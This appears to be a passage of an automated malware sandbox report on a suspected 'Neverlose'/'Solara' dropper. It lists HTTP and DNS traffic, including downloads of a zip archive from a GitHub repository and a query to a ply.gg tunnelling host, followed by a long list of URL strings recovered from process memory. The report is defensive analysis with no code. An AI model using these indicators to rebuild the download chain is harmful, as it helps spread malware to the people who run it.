                  Source: global trafficHTTP traffic detected: GET /quivings/Solara/main/Storage/version.txt HTTP/1.1User-Agent: SolaraHost: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com
                  Source: global trafficDNS traffic detected: DNS query: github.com
                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: 22.ip.gl.ply.gg
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Sat, 24 Aug 2024 19:55:04 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: FE3C:A4EB4:914EDB:A2C9D5:66CA3A99Accept-Ranges: bytesDate: Sat, 24 Aug 2024 19:55:05 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740072-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1724529306.809325,VS0,VE8Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: bdaf9571f5649794f8b717df41ba184de9a7a2f1Expires: Sat, 24 Aug 2024 20:00:05 GMTSource-Age: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Sat, 24 Aug 2024 19:55:04 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                  Source: powershell.exe, 0000000D.00000002.2060250567.0000024348BC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                  Source: powershell.exe, 0000000D.00000002.2060250567.0000024348BC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                  Source: powershell.exe, 00000013.00000002.2532316292.00000204B1F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                  Source: powershell.exe, 00000001.00000002.1708078820.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1873584903.000001B390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2035739099.00000243405D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2242695799.000002DC7232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                  Source: powershell.exe, 0000000D.00000002.2060250567.0000024348C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic)
                  Source: powershell.exe, 00000001.00000002.1705141692.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC624E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000001.00000002.1705141692.0000000005061000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000004.00000002.2914277285.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC622C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000001.00000002.1705141692.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC624E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                  Source: Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                  Source: powershell.exe, 00000013.00000002.2532847768.00000204B2010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: powershell.exe, 00000007.00000002.1819250516.000001B380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC622C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000001.00000002.1705141692.0000000005061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/errors
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/stats
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.github.com/github/collect
                  Source: powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github-cloud.s3.amazonaws.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.blog
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                  Source: powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/collections
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/customer-stories
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise/advanced-security
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise/startups
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/actions
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/code-review
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/codespaces
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/copilot
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/discussions
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/issues
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/packages
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/security
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/fluidicon.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip&quot;
                  Source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.drString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipK
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipd
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/readme
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/ci-cd
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/devops
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/devsecops
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/financial-services
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/healthcare
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/manufacturing
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/te
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/team
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/topics
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/trending
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-type
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-11260080
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/behaviors-3b4c83250375.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark-6b1e37da2254.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-a4629b2e906b.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.css
